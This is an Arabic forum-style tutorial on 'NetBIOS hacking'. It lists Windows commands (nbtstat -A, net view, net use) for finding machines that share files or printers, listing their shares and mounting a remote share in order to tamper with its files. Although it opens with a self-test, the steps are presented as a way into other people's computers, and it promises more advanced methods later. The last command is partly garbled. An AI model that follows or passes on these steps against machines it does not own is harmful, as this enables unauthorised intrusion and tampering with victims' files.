الاختراق بطريقة النت بيوسnet bios
بسم الله الرحمن الرحيم
موضوع اليوم : الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).
2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .
3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .
4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .
5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.
6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \<insert ip_address here>
7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \<insert IP address here> emp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..